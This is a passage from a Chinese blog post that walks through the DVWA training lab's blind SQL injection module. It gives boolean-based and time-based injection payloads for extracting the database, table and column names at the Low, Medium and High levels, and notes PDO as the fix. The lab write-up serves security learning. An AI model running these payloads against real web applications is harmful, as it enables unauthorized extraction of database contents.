<p>Low Level源代码：<br>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frggymb7dyj30zq0ixt9x.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frggymb7dyj30zq0ixt9x.jpg</a>)
可以看到，Low级别的代码对参数id没有做任何检查、过滤，存在明显的SQL注入漏洞，同时SQL语句查询返回的结果只有两种，‘<br>User ID exists in the database.<br>‘与‘<code>User ID is MISSING from the database.</code> ，因此这里是SQL盲注漏洞。</p>
<h2 id="SQL-INJECTION-BLIND-模块核心漏洞利用-Low-Level"><a href="#SQL-INJECTION-BLIND-模块核心漏洞利用-Low-Level" class="headerlink" title="SQL INJECTION (BLIND)模块核心漏洞利用-Low Level"></a>SQL INJECTION (BLIND)模块核心漏洞利用-Low Level</h2><h3 id="基于布尔的盲注："><a href="#基于布尔的盲注：" class="headerlink" title="基于布尔的盲注："></a>基于布尔的盲注：</h3><ul>
<li>判断是否存在注入，注入是字符型还是数字型</li>
</ul>
<p>输入1，显示相应用户存在：</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgh3ybi6tj30cx048jrm.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgh3ybi6tj30cx048jrm.jpg</a>)</p>
<p>输入1’ and 1=1 #，显示存在：</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgh4qj9frj30d804aq36.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgh4qj9frj30d804aq36.jpg</a>)</p>
<p>输入1’ and 1=2 #，显示不存在：</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgh9msh0lj30di043dg2.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgh9msh0lj30di043dg2.jpg</a>)</p>
<p>说明存在字符型的SQL盲注。</p>
<ul>
<li>猜解当前数据库名</li>
</ul>
<p>想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。<br>输入1’ and length(database())=1 #，显示不存在；<br>输入1’ and length(database())=2 #，显示不存在；<br>输入1’ and length(database())=3 #，显示不存在；<br>输入1’ and length(database())=4 #，显示存在：<br>说明数据库名长度为4。</p>
<p>下面采用二分法猜解数据库名。</p>
<p>输入1’ and ascii(substr(databse(),1,1))&gt;97 #，显示存在，说明数据库名的第一个字符的ascii值大于97（小写字母a的ascii值）；</p>
<p>输入1’ and ascii(substr(databse(),1,1))&lt;122 #，显示存在，说明数据库名的第一个字符的ascii值小于122（小写字母z的ascii值）；</p>
<p>输入1’ and ascii(substr(databse(),1,1))&lt;109 #，显示存在，说明数据库名的第一个字符的ascii值小于109（小写字母m的ascii值）；</p>
<p>输入1’ and ascii(substr(databse(),1,1))&lt;103 #，显示存在，说明数据库名的第一个字符的ascii值小于103（小写字母g的ascii值）；</p>
<p>输入1’ and ascii(substr(databse(),1,1))&lt;100 #，显示不存在，说明数据库名的第一个字符的ascii值不小于100（小写字母d的ascii值）；</p>
<p>输入1’ and ascii(substr(databse(),1,1))&gt;100 #，显示不存在，说明数据库名的第一个字符的ascii值不大于100（小写字母d的ascii值），所以数据库名的第一个字符的ascii值为100，即小写字母d。<br>…</p>
<p>重复上述步骤，就可以猜解出完整的数据库名（dvwa）了。</p>
<ul>
<li>猜解数据库中的表名</li>
</ul>
<p>首先猜解数据库中表的数量：<br>1’ and (select count (table_name) from information_schema.tables where table_schema=database())=1 # 显示不存在</p>
<p>1’ and (select count (table_name) from information_schema.tables where table_schema=database() )=2 # 显示存在</p>
<p>说明数据库中共有两个表。</p>
<p>接着挨个猜解表名：</p>
<p>1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 显示不存在</p>
<p>1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 显示不存在<br>…</p>
<p>1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显示存在</p>
<p>说明第一个表名长度为9。</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;97 # 显示存在</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;122 # 显示存在</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;109 # 显示存在</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;103 # 显示不存在</p>
<p>1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;103 # 显示不存在<br>说明第一个表的名字的第一个字符为小写字母g。<br>…</p>
<p>重复上述步骤，即可猜解出两个表名（guestbook、users）。</p>
<ul>
<li>猜解表中的字段名</li>
</ul>
<p>首先猜解表中字段的数量：</p>
<p>1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=1 # 显示不存在<br>…</p>
<p>1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 # 显示存在</p>
<p>说明users表有8个字段。</p>
<p>接着挨个猜解字段名：</p>
<p>1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 # 显示不存在<br>…</p>
<p>1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7 # 显示存在</p>
<p>说明users表的第一个字段为7个字符长度。</p>
<p>采用二分法，即可猜解出所有字段名。</p>
<ul>
<li>猜解数据</li>
</ul>
<p>同样采用二分法。</p>
<h3 id="基于时间的盲注："><a href="#基于时间的盲注：" class="headerlink" title="基于时间的盲注："></a>基于时间的盲注：</h3><ul>
<li>判断是否存在注入，注入是字符型还是数字型</li>
</ul>
<p>输入1’ and sleep(5) #，感觉到明显延迟；</p>
<p>输入1 and sleep(5) #，没有延迟；</p>
<p>说明存在字符型的基于时间的盲注。</p>
<ul>
<li>猜解当前数据库名</li>
</ul>
<p>首先猜解数据名的长度：</p>
<p>1’ and if(length(database())=1,sleep(5),1) # 没有延迟</p>
<p>1’ and if(length(database())=2,sleep(5),1) # 没有延迟</p>
<p>1’ and if(length(database())=3,sleep(5),1) # 没有延迟</p>
<p>1’ and if(length(database())=4,sleep(5),1) # 明显延迟</p>
<p>说明数据库名长度为4个字符。</p>
<p>接着采用二分法猜解数据库名：</p>
<p>1’ and if(ascii(substr(database(),1,1))&gt;97,sleep(5),1)# 明显延迟<br>…</p>
<p>1’ and if(ascii(substr(database(),1,1))&lt;100,sleep(5),1)# 没有延迟</p>
<p>1’ and if(ascii(substr(database(),1,1))&gt;100,sleep(5),1)# 没有延迟</p>
<p>说明数据库名的第一个字符为小写字母d。<br>…</p>
<p>重复上述步骤，即可猜解出数据库名。</p>
<ul>
<li>猜解数据库中的表名</li>
</ul>
<p>首先猜解数据库中表的数量：</p>
<p>1’ and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 没有延迟</p>
<p>1’ and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明显延迟</p>
<p>说明数据库中有两个表。</p>
<p>接着挨个猜解表名：</p>
<p>1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 没有延迟<br>…</p>
<p>1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明显延迟</p>
<p>说明第一个表名的长度为9个字符。</p>
<p>采用二分法即可猜解出表名。</p>
<ul>
<li>猜解表中的字段名</li>
</ul>
<p>首先猜解表中字段的数量：</p>
<p>1’ and if((select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)# 没有延迟<br>…</p>
<p>1’ and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明显延迟</p>
<p>说明users表中有8个字段。</p>
<p>接着挨个猜解字段名：</p>
<p>1’ and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 没有延迟<br>…</p>
<p>1’ and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明显延迟</p>
<p>说明users表的第一个字段长度为7个字符。</p>
<p>采用二分法即可猜解出各个字段名。</p>
<ul>
<li>猜解数据</li>
</ul>
<p>同样采用二分法。</p>
<p>Medium Level源代码：</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frghwps8eaj31b30i675m.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frghwps8eaj31b30i675m.jpg</a>)</p>
<h2 id="SQL-INJECTION-BLIND-模块核心漏洞利用-Medium-Level"><a href="#SQL-INJECTION-BLIND-模块核心漏洞利用-Medium-Level" class="headerlink" title="SQL INJECTION (BLIND)模块核心漏洞利用-Medium Level"></a>SQL INJECTION (BLIND)模块核心漏洞利用-Medium Level</h2><p>可以看到，Medium级别的代码利用mysql_real_escape_string函数对特殊符号<br>\x00,\n,\r,,’,”,\x1a进行转义，同时前端页面设置了下拉选择表单，希望以此来控制用户的输入。</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frghyzgy04j30hk08lab7.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frghyzgy04j30hk08lab7.jpg</a>)</p>
<p>虽然前端使用了下拉选择菜单，但我们依然可以通过抓包改参数id，提交恶意构造的查询参数。<br>之前已经介绍了详细的盲注流程，这里就简要演示几个。</p>
<h3 id="首先是基于布尔的盲注："><a href="#首先是基于布尔的盲注：" class="headerlink" title="首先是基于布尔的盲注："></a>首先是基于布尔的盲注：</h3><p>抓包改参数id为1 and length(database())=4 #，显示存在，说明数据库名的长度为4个字符；</p>
<p>抓包改参数id为1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #，显示存在，说明数据中的第一个表名长度为9个字符；</p>
<p>抓包改参数id为1 and (select count(column_name) from information_schema.columns where table_name= 0x7573657273)=8 #，（0x7573657273为users的16进制），显示存在，说明uers表有8个字段。</p>
<h3 id="然后是基于时间的盲注："><a href="#然后是基于时间的盲注：" class="headerlink" title="然后是基于时间的盲注："></a>然后是基于时间的盲注：</h3><p>抓包改参数id为1 and if(length(database())=4,sleep(5),1) #，明显延迟，说明数据库名的长度为4个字符；</p>
<p>抓包改参数id为1 and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #，明显延迟，说明数据中的第一个表名长度为9个字符；</p>
<p>抓包改参数id为1 and if((select count(column_name) from information_schema.columns where table_name=0×7573657273 )=8,sleep(5),1) #，明显延迟，说明uers表有8个字段。</p>
<p>High Level源代码：</p>
<p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgi1yjfs6j30z00m40u4.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgi1yjfs6j30z00m40u4.jpg</a>)</p>
<p>可以看到，High级别的代码利用cookie传递参数id，当SQL查询结果为空时，会执行函数sleep(seconds)，目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1，希望以此控制只输出一个结果。</p>
<h2 id="SQL-INJECTION-BLIND-模块核心漏洞利用-High-Level"><a href="#SQL-INJECTION-BLIND-模块核心漏洞利用-High-Level" class="headerlink" title="SQL INJECTION (BLIND)模块核心漏洞利用- High Level"></a>SQL INJECTION (BLIND)模块核心漏洞利用- High Level</h2><p>虽然添加了LIMIT 1，但是我们可以通过#将其注释掉。但由于服务器端执行sleep函数，会使得基于时间盲注的准确性受到影响，</p>
<p>这里我们只演示基于布尔的盲注：</p>
<p>抓包将cookie中参数id改为1’ and length(database())=4 #，显示存在，说明数据库名的长度为4个字符；</p>
<p>抓包将cookie中参数id改为1’ and length(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #，显示存在，说明数据中的第一个表名长度为9个字符；</p>
<p>抓包将cookie中参数id改为1’ and (select count(column_name) from information_schema.columns where table_name=0×7573657273)=8 #，（0×7573657273 为users的16进制），显示存在，说明uers表有8个字段。</p>
<h2 id="SQL-INJECTION-BLIND-模块核心代码分析-Impossible-Level"><a href="#SQL-INJECTION-BLIND-模块核心代码分析-Impossible-Level" class="headerlink" title="SQL INJECTION (BLIND)模块核心代码分析- Impossible Level"></a>SQL INJECTION (BLIND)模块核心代码分析- Impossible Level</h2><p>(<a href="https://ws1.sinaimg.cn/large/006Y5bsfly1frgi3isuflj30x00mn0u3.jpg" target="_blank" rel="noopener">https://ws1.sinaimg.cn/large/006Y5bsfly1frgi3isuflj30x00mn0u3.jpg</a>)</p>
<p>可以看到，Impossible级别的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入，Anti-CSRF token机制的加入了进一步提高了安全性。</p>

        
    

    
</div>


                

                <!-- Post Comments -->
                
                    
    <div id="comment" style='padding:10px;' class="vcomment"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
    var GUEST_INFO = ['nick','mail','link'];
    var guest_info = 'nick,mail,link'.split(',').filter(function(item){
        return GUEST_INFO.indexOf(item) > -1
    });
    var notify = 'false' == true;
    var verify = 'false' == true;
    new Valine({
        el: '.vcomment',
        notify: notify,
        verify: verify,
        appId: "lJO1Wf7DNPffOS9qhF3DTmqz-gzGzoHsz",
        appKey: "gQbM30LGcOCpnotBDR7gSmF2",
        placeholder: "快来评论吧~~",
        pageSize:'10',
        avatar:'identicon',
        lang:'zh-cn'
    });
</script>

                
            </div>

            <!-- Post Prev & Next Nav -->
            <nav class="material-nav mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
    <!-- Prev Nav -->
    
        <a href="/2018/05/19/XSS跨站脚本攻击/" id="post_nav-newer" class="prev-content">
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_back</i>
            </button>
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            新篇
        </a>
    

    <!-- Section Spacer -->
    <div class="section-spacer"></div>

    <!-- Next Nav -->
    
        <a href="/2018/05/15/初识DVWA/" id="post_nav-older" class="next-content">
            旧篇
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_forward</i>
            </button>
        </a>
    
</nav>

        </div>
    </div>


                    
                        <!-- Overlay For Active Sidebar -->
<div class="sidebar-overlay"></div>

<!-- Material sidebar -->
<aside id="sidebar" class="sidebar sidebar-colored sidebar-fixed-left" role="navigation">
    <div id="sidebar-main">
        <!-- Sidebar Header -->
        <div class="sidebar-header header-cover" style="background-image: url(/img/sidebar_header.png);">
    <!-- Top bar -->
    <div class="top-bar"></div>

    <!-- Sidebar toggle button -->
    <button type="button" class="sidebar-toggle mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon" style="display: initial;" data-upgraded=",MaterialButton,MaterialRipple">
        <i class="material-icons">clear_all</i>
        <span class="mdl-button__ripple-container">
            <span class="mdl-ripple">
            </span>
        </span>
    </button>

    <!-- Sidebar Avatar -->
    <div class="sidebar-image">
        <img src="/img/avatar.png" alt="GhackerM's avatar">
    </div>

    <!-- Sidebar Email -->
    <a data-toggle="dropdown" class="sidebar-brand" href="#settings-dropdown">
        1em0n
        <b class="caret"></b>
    </a>
</div>


        <!-- Sidebar Navigation  -->
        <ul class="nav sidebar-nav">
    <!-- User dropdown  -->
    <li class="dropdown">
        <ul id="settings-dropdown" class="dropdown-menu">
            
                <li>
                    <a href="https://1em0n.site" target="_blank" title="图床">
                        
                            <i class="material-icons sidebar-material-icons sidebar-indent-left1pc-element">images</i>
                        
                        图床
                    </a>
                </li>
            
        </ul>
    </li>

    <!-- Homepage -->
    
        <li id="sidebar-first-li">
            <a href="/">
                
                    <i class="material-icons sidebar-material-icons">home</i>
                
                主页
            </a>
        </li>
        
    

    <!-- Archives  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">inbox</i>
                
                    归档
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
            <li>
                <a class="sidebar_archives-link" href="/archives/2019/12/">十二月 2019<span class="sidebar_archives-count">6</span></a></li><li><a class="sidebar_archives-link" href="/archives/2019/07/">七月 2019<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2019/06/">六月 2019<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2019/05/">五月 2019<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2019/04/">四月 2019<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2019/03/">三月 2019<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/11/">十一月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/09/">九月 2018<span class="sidebar_archives-count">5</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/06/">六月 2018<span class="sidebar_archives-count">6</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/05/">五月 2018<span class="sidebar_archives-count">6</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/04/">四月 2018<span class="sidebar_archives-count">1</span></a>
            </ul>
        </li>
        
    

    <!-- Categories  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">chrome_reader_mode</i>
                
                分类
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
                <li>
                <a class="sidebar_archives-link" href="/categories/bookstudy/">bookstudy<span class="sidebar_archives-count">7</span></a></li><li><a class="sidebar_archives-link" href="/categories/ctf/">ctf<span class="sidebar_archives-count">10</span></a></li><li><a class="sidebar_archives-link" href="/categories/kali/">kali<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/categories/ubuntu/">ubuntu<span class="sidebar_archives-count">3</span></a></li><li><a class="sidebar_archives-link" href="/categories/图床/">图床<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/categories/网络攻防/">网络攻防<span class="sidebar_archives-count">9</span></a>
            </ul>
        </li>
        
    

    <!-- Pages  -->
    
        <li>
            <a href="/timeline" title="时间线">
                
                    <i class="material-icons sidebar-material-icons">send</i>
                
                时间线
            </a>
        </li>
        
    
        <li>
            <a href="/tags" title="标签云">
                
                    <i class="material-icons sidebar-material-icons">cloud_circle</i>
                
                标签云
            </a>
        </li>
        
    
        <li>
            <a href="/about" title="关于">
                
                    <i class="material-icons sidebar-material-icons">person</i>
                
                关于
            </a>
        </li>
        
    
        <li>
            <a href="/show" title="作品展示">
                
                    <i class="material-icons sidebar-material-icons">reply</i>
                
                作品展示
            </a>
        </li>
        
    
        <li>
            <a href="/links" title="友情链接">
                
                    <i class="material-icons sidebar-material-icons">link</i>
                
                友情链接
            </a>
        </li>
        
    

    <!-- Article Number  -->
    
        <li>
            <a href="/archives">
                文章总数
                <span class="sidebar-badge">34</span>
            </a>
        </li>
        
    
</ul>


        <!-- Sidebar Footer -->
        <!--
I'm glad you use this theme, the development is no so easy, I hope you can keep the copyright, I will thank you so much.
If you still want to delete the copyrights, could you still retain the first one? Which namely "Theme Material"
It will not impact the appearance and can give developers a lot of support :)

很高兴您使用并喜欢该主题，开发不易 十分谢谢与希望您可以保留一下版权声明。
如果您仍然想删除的话 能否只保留第一项呢？即 "Theme Material"
它不会影响美观并可以给开发者很大的支持和动力。 :)
-->

<!-- Sidebar Divider -->

    <div class="sidebar-divider"></div>


<!-- Theme Material -->

    <a href="https://github.com/viosey/hexo-theme-material"  class="sidebar-footer-text-a" target="_blank">
        <div class="sidebar-text mdl-button mdl-js-button mdl-js-ripple-effect sidebar-footer-text-div" data-upgraded=",MaterialButton,MaterialRipple">
            主题 - Material
            <span class="sidebar-badge badge-circle">i</span>
        </div>
    </a>


<!-- Help & Support -->
<!--

-->

<!-- Feedback -->
<!--

-->

<!-- About Theme -->
<!--

-->

    </div>

    <!-- Sidebar Image -->
    

</aside>

                    
                    
                        <!-- Footer Top Button -->
                        <div id="back-to-top" class="toTop-wrap">
    <a href="#top" class="toTop">
        <i class="material-icons footer_top-i">expand_less</i>
    </a>
</div>

                    
                    <!--Footer-->
<footer class="mdl-mini-footer" id="bottom">
    
        <!-- Paradox Footer Left Section -->
        <div class="mdl-mini-footer--left-section sns-list">
    <!-- Twitter -->
    
        <a href="https://twitter.com/1em0n2" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-twitter">
                <span class="visuallyhidden">Twitter</span>
            </button><!--
     --></a>
    

    <!-- Facebook -->
    

    <!-- Google + -->
    
        <a href="https://yuehuaer.blogspot.com/" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-gplus">
                <span class="visuallyhidden">Google Plus</span>
            </button><!--
     --></a>
    

    <!-- Weibo -->
    

    <!-- Instagram -->
    

    <!-- Tumblr -->
    

    <!-- Github -->
    
        <a href="https://github.com/ghuaerm" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-github">
                <span class="visuallyhidden">Github</span>
            </button><!--
     --></a>
    

    <!-- LinkedIn -->
    

    <!-- Zhihu -->
    

    <!-- Bilibili -->
    

    <!-- Telegram -->
    
    
    <!-- V2EX -->
    
</div>

        <!--Copyright-->
        <div id="copyright">
            Copyright&nbsp;©&nbsp;<span year></span>&nbsp;Ghakerm'blog
            
        </div>
        <!-- Paradox Footer Right Section -->
        <!--
        I am glad you use this theme, the development is no so easy, I hope you can keep the copyright.
        It will not impact the appearance and can give developers a lot of support :)
        很高兴您使用该主题，开发不易，希望您可以保留一下版权声明。
        它不会影响美观并可以给开发者很大的支持。 :)
        -->
        <div class="mdl-mini-footer--right-section">
            <div>
                <div class="footer-develop-div">Powered by <a href="https://hexo.io" target="_blank" class="footer-develop-a">Hexo</a></div>
                <div class="footer-develop-div">Theme - <a href="https://github.com/viosey/hexo-theme-material" target="_blank" class="footer-develop-a">Material</a></div>
            </div>
        </div>
    
</footer>
                    <!-- Import JS File -->

    <script>lsloader.load("lazyload_js","/js/lazyload.min.js?wgjW/HuQG9JDgvPDPoRAng==", true)</script>



    <script>lsloader.load("js_js","/js/js.min.js?V/53wGualMuiPM3xoetD5Q==", true)</script>



    <script>lsloader.load("np_js","/js/nprogress.js?pl3Qhb9lvqR1FlyLUna1Yw==", true)</script>


<script type="text/ls-javascript" id="NProgress-script">
    NProgress.configure({
        showSpinner: true
    });
    NProgress.start();
    $('#nprogress .bar').css({
        'background': '#29d'
    });
    $('#nprogress .peg').css({
        'box-shadow': '0 0 10px #29d, 0 0 15px #29d'
    });
    $('#nprogress .spinner-icon').css({
        'border-top-color': '#29d',
        'border-left-color': '#29d'
    });
    setTimeout(function() {
        NProgress.done();
        $('.fade').removeClass('out');
    }, 800);
</script>





    <!-- Leancloud -->
    <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
    <script>
        AV.initialize('lJO1Wf7DNPffOS9qhF3DTmqz-gzGzoHsz', 'gQbM30LGcOCpnotBDR7gSmF2');
    </script>
    <script type="text/ls-javascript" id="leancloud-views-script">
    function showTime(Counter) {
        var query = new AV.Query(Counter);
        $('.leancloud-views_num').each(function() {
            var url = $(this).attr('id').trim();
            query.equalTo('url', url);
            query.find({
                success: function(results) {
                    if (results.length === 0) {
                        var content = '0 ' + $(document.getElementById(url)).text();
                        $(document.getElementById(url)).text(content);
                        return;
                    }
                    for (var i = 0; i < results.length; i++) {
                        var object = results[i];
                        var content = object.get('time') + ' ' + $(document.getElementById(url)).text();
                        $(document.getElementById(url)).text(content);
                    }
                },
                error: function(object, error) {
                    console.log('Error: ' + error.code + ' ' + error.message);
                }
            });
        });
    }

    function addCount(Counter) {
      var Counter = AV.Object.extend('Counter');
      url = $('.leancloud-views_num').attr('id').trim();
      title = $('.leancloud-views_num').attr('data-flag-title').trim();
      var query = new AV.Query(Counter);
      query.equalTo('url', url);
      query.find({
          success: function(results) {
            if (results.length > 0) {
                var counter = results[0];
                counter.fetchWhenSave(true);
                counter.increment('time');
                counter.save(null, {
                    success: function(counter) {
                        var content =  counter.get('time') + ' ' + $(document.getElementById(url)).text();
                        $(document.getElementById(url)).text(content);
                    },
                    error: function(counter, error) {
                        console.log('Failed to save Visitor num, with error message: ' + error.message);
                    }
                });
            } else {
              var newcounter = new Counter();
              newcounter.set('title', title);
              newcounter.set('url', url);
              newcounter.set('time', 1);
              newcounter.save(null, {
                  success: function(newcounter) {
                      console.log('newcounter.get(\'time\')='+newcounter.get('time'));
                      var content = newcounter.get('time') + ' ' + $(document.getElementById(url)).text();
                      $(document.getElementById(url)).text(content);
                  },
                  error: function(newcounter, error) {
                      console.log('Failed to create');
                  }
              });
            }
        },
        error: function(error) {
            console.log('Error:' + error.code + ' ' + error.message);
        }
      });
    }
    $(function() {
        var Counter = AV.Object.extend('Counter');
        if ($('.leancloud-views_num').length === 1) {
            addCount(Counter);
        } else if ($('.post-title-link').length > 1) {
            showTime(Counter);
        }
    });
</script>




    <!-- Busuanzi -->
    <script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



   





<!-- UC Browser Compatible -->
<script>
	var agent = navigator.userAgent.toLowerCase();
	if(agent.indexOf('ucbrowser')>0) {
		document.write('<link rel="stylesheet" href="/css/uc.css">');
	   alert('由于 UC 浏览器使用极旧的内核，而本网站使用了一些新的特性。\n为了您能更好的浏览，推荐使用 Chrome 或 Firefox 浏览器。');
	}
</script>

<!-- Import prettify js  -->



<!-- Window Load -->
<!-- add class for prettify -->
<script type="text/ls-javascript" id="window-load">
    $(window).on('load', function() {
        // Post_Toc parent position fixed
        $('.post-toc-wrap').parent('.mdl-menu__container').css('position', 'fixed');
    });

    
    
</script>

<!-- MathJax Load-->


<!-- Bing Background -->


<script type="text/ls-javascript" id="lazy-load">
    // Offer LazyLoad
    queue.offer(function(){
        $('.lazy').lazyload({
            effect : 'show'
        });
    });

    // Start Queue
    $(document).ready(function(){
        setInterval(function(){
            queue.execNext();
        },200);
    });
</script>

<!-- Custom Footer -->



<script>
    (function(){
        var scriptList = document.querySelectorAll('script[type="text/ls-javascript"]')

        for (var i = 0; i < scriptList.length; ++i) {
            var item = scriptList[i];
            lsloader.runInlineScript(item.id,item.id);
        }
    })()
console.log('\n %c © Material Theme | Version: 1.5.2 | https://github.com/viosey/hexo-theme-material %c \n', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-left-radius:5px;border-bottom-left-radius:5px;', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-right-radius:5px;border-bottom-right-radius:5px;');
</script>

                </main>
            </div>
        </body>
    
</html>